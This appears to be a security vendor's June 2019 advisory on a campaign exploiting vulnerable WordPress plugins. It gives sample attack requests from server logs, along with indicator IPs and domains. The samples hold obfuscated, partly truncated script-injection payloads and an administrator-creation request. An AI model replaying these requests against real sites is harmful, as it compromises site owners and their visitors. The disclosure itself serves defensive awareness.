Plugins Under Attack: June 2019

A long-lasting malware campaign (1,2) targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites.

As part of a strategy to rotate attack vectors and compromise as many sites as possible, we found a number of new plugins added to this campaign during this past month:

Plugins Under Attack

• WP-Piwik
• Blog Designer
• WP Support Plus Responsive Ticket System
• Convert Plus Plugin
• Live Chat with Facebook Messenger
• Wp Quick Booking Manager
• Post Custom Templates Lite
• Wp File Manager

The plugins that are continuing to be leveraged and appear to be giving attackers the best results include:

• WP Live Chat Support
• Yellow Pencil Visual Theme Customizer
• Social Warfare
• Yuzo Related Post

Samples Attack Requests

WP-Piwik

45.67.228.17 - wp-piwik%5Btrack_mode%5D=manually&wp-piwik%5Btracking_code%5D=%3Cscript+type%3Dtext%2Fjavascript+async%3Dtrue%3Evar+nt+%3D+String.fromCharCode%2898%2C+98%2C+98%2C+55%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3B...skipped...%2Cn%29%3B%3C%2Fscript%3E [25/Jun/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Blog Designer

45.67.228.14 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript%3Evar+nt+%3D+String.fromCharCode%2898%2C+98%2C+98%2C+51%29%3Bvar+mb+%3D+String.fromChar...skipped...2C+114%2C+105%2C+112%2C+116%2C+38%2C+118%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Dlb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&updated=true [25/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Support Plus Responsive Ticket System

91.121.54.71 - action=wpsp_upload_attachment [23/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Convert Plus Plugin

68.183.131.57 - action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=workspace%40kleverandeverbever.top&param%5Bemail%5D=workspace%40kleverandeverbever.top [16/Jun/2019:02:37:42 +0000] "POST /wp-admin/admin-ajax.php?action=cp_add_subscriber HTTP/1.1" 

Live Chat with Facebook Messenger

46.105.102.54 - domain=%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%2C+39%2C+41%2C+59%2C+32%2C+10%2C+115%2C+46%2C+116%2C+12...skipped...+101%2C+40%2C+39%2C+104%2C+101%2C+97%2C+100%2C+39%2C+41%2C+91%2C+48%2C+93%2C+46%2C+97%2C+112%2C+112%2C+101%2C+110%2C+100%2C+67%2C+104%2C+105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E%3Cscript%3E [07/Jun/2019:14:01:05 +0000] "POST /wp-admin/admin-ajax.php?action=update_zb_fbc_code HTTP/1.1"

WP Quick Booking Manager

46.105.102.54 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%2C+39%2C+41%2C+59%2C+32%2C+...skipped...5%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [07/Jun/2019:14:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

46.105.102.54 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=%3C%2Ftextarea%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+...skipped...%2C+84%2C+97%2C+103%2C+78%2C+97%2C+109%2C+101%2C+40%2C+39%2C+104%2C+101%2C+97%2C+100%2C+39%2C+41%2C+91%2C+48%2C+93%2C+46%2C+97%2C+112%2C+112%2C+101%2C+110%2C+100%2C+67%2C+104%2C+105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E [07/Jun/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Wp File Manager

79.116.192.67 - action=mk_check_filemanager_php_syntax [01/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Malicious Domains and IPs

IPs

45.67.228.15
45.67.229.14
45.67.228.17
109.96.171.178
91.121.54.71
185.238.1.175
185.238.1.179
185.238.1.176
185.238.1.53
68.183.131.57
46.105.102.54
185.238.1.53
185.212.129.164
185.238.0.153
162.254.253.193
79.116.192.67

Domains

deliverygoodstrategy[.]com
letsmakesomechoice[.]com
garrygudini[.]com
kleverandeverbever[.]top

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.